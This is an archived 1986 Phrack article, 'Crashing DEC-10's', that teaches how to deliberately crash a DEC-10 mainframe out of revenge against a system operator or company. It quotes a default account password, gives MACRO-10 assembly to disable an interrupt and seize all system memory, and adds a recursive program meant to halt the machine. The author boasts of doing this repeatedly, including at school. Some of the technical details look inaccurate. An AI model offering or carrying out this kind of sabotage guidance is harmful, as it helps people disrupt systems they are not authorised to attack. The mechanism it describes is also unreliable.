home *** CD-ROM | disk | FTP | other *** search

---

/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / phrk1 / ph046.txt

< prev

next >

Wrap

Text File  |  1992-09-26  |  5KB  |  118 lines

---

1.                                 ==Phrack Inc.==
2.  
3.                     Volume One, Issue Four, Phile #6 of 11
4.  
5.                                Crashing DEC-10's
6.                               by The Neuromancer
7.                                     3-13-86
8.  
9.  
10.  
11.         Occasionally there will be a time when destruction is necessary.
12.         Whether it is revenge against a tyrannical system operator or against
13. a particular company, sometimes it is desirable to strike at the heart of a
14. company...their computer.
15.         What follows is a fairly detailed explanation of how to go about
16. crashing a DEC-10 computer running any operating system.  The user will have
17. to be able to create and execute assembly level and high level language
18. files, as well as having a good working knowledge of programming.
19.         The first step is to obtain an account.  Whether this be a default
20. account like 5,30 (pw: GAMES) or an account that you hacked by some other
21. method, you have to be able to access the system.  Superuser access is not
22. necessary, however, for this method to work.
23.         At the heart of every mainframe computer is the central processing
24. unit.  The CPU handles all instructions, fetching them from memory, decoding
25. them, and executing them.  A DEC has what is called a DMA (Direct Memory
26. Access) Controller that functions as a small CPU handling all the input and
27. output from memory and peripherals, freeing the main CPU to execute instruc-
28. tions.  We take advantage of this fact in crashing the system.
29.         Theory:  The CPU depends on the DMA Controller to handle all memory
30. access.  If the DMA can be crashed, the CPU grinds to a halt and the sysop
31. has to run DSK:RAT to restore all the files on the system (a one hour process,
32. deadly at peak operating time.)  We cause the DMA to crash by slowing it down
33. incredibly and overflowing the system stack.
34.         Practice-
35.         There exists an area known as 'Job Data Area' at octal 20 through 140
36. of the user's memory.  This stores all relevant information about the current
37. task executing.  The individual locations each have a 6-bit mnemonic starting
38. with .JB in each case.  These must be introduced into a symbol table as ext-
39. ernal references.
40.         The highest core address available to the user is stored at .JBREL
41. in the Job Data Area.  If you try to access more core than you are allowed,
42. you will get an interrupt and it will crash.  The first step is to disable
43. the interrupt.  This is done by setting bit 22 in the AC to 1.  This is done
44. with a mask as follows...
45.         APRENB  AC
46.         MOVEI   AC,20000 (octal)
47.         The interrupt is now shut out.  Next, you must start snatching up all
48. available system core.  This cannot be done by directly meddling with .JBREL.
49. Instead, you must alter AC (accumulator) to contain the highest desired
50. address and then move it into .JBREL.  This can be done with the following
51. subroutine.
52.         CORE    AC,
53. TOP:    MOVE    AC,.JBREL##
54.         AOJA    AC,.+1
55.         CORE    AC,
56.         BRA     TOP
57.         At first, incrementing only by one looks like a slow way to grab core,
58. but since it is only allocated in chunks of either 1K or 2K words, you can
59. quickly suck up a lot of memory.  (Following this file is a complete sample
60. program in MACRO-10 showing how to increase the core to a certain limit.)
61.         Now that we have all the core we can get, the system is already more
62. than likely slowing down.  This is good.  Now we put in the fatal blow.
63. You should already have prepared a program that relies heavily on recursion.
64. The choice languages for this are either C or Pascal.  Simply set up a simple
65. recursive program (Towers of Hanoi with 100 rings, for instance), and tell it
66. to execute.
67.         What will begin to happen is that the DMA stack will start filling up,
68. slowing the system down even further.  Eventually, after between 5 minutes and
69. 15 minutes (longest it's ever taken me), you get the nice beep and...
70.         ;;OPSER- DEC SYSTEM-10 NOT RUNNING
71.         I've only had to do this on three systems that the sysop really
72. pissed me off (not counting the system where I go to school, on which I do
73. it all the time when I'm bored...)  It's kind of an extreme measure, but
74. it can be an effective one.
75.         The following program is a sample for those not familiar with MACRO-10
76. assembly language.
77. 32
78.  
79. START:  TITLE   SAMPLE
80.         MOVE    P,[IOWD  3,MEM]
81.         MOVE    [PUSHJ  P,PDLOV]
82.         MOVEM   .JBAPR##
83.         MOVEI   AC,600000
84.         APRENB  AC,
85.         SETZB   CT
86.         MOVEM   AC
87.         AOS
88.         PUSHJ   P,S1
89.         JRST    .-3
90. S1:     IDIVI   AC,10
91.         HRLM    N,(P)
92.         JUMPE   AC,.+3
93.         PUSHJ   P,S1
94.         SKIPA
95.         PUSHJ   P,S2
96.         HLRZ    N,(P)
97.         ADDI    N,60
98.         OUTCHR  N
99.         POPJ    P,
100. S2:     SOJG    CT,.+4
101.         OUTCHR  [15]
102.         OUTCHR  [12]
103.         MOVEI   CT,10
104.         MOVE    T,P
105.         OUTCHR  [40]
106.         AOBJN   T,.-1
107.         POPJ    P,
108. PDLOV:  PUSHJ   P,LIMIT
109.         SUB     P,[1,,0]
110.         JRSTF   @.JBTPC##
111. LIMIT:  CAIL    1000            ;CHANGE TO WHATEVER YOU WANT!
112.         EXIT
113.         POPJ    P,
114. MEM:    BLOCK   10
115.         END     START
116. 
117. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
118.